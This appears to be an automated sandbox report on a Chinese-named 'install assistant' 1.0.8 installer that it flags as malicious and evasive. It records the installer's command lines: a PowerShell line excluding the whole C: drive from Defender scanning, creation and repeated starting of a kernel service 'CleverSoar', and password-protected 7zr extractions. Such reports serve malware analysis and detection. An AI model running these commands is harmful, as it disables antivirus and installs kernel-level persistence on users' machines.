Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr | String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr | String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process information set: 01 00 00 00

System Summary

Source: update.vac.1.dr | Static PE information: section name: .=~
Source: hrsw.vbc.5.dr | Static PE information: section name: .=~
Source: update.vac.5.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C883886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA05120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C883C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C883D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA05D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C883D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C8839CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C883A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C881950: CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6C884754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A61E40 appears 82 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A628E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00AFFB10 appears 720 times
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: String function: 6CAD6F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: String function: 6CA39240 appears 31 times
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F38A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000000.1759621970.0000000000E69000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.11.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.11.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal80.evad.winEXE@144/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA05D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A69313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A73D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00A69252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Code function: 5_2_6CA05240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | File created: C:\Program Files (x86)\Windows NT\is-98LL2.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | File created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | Process created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe | Process created: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" Jump to behavior
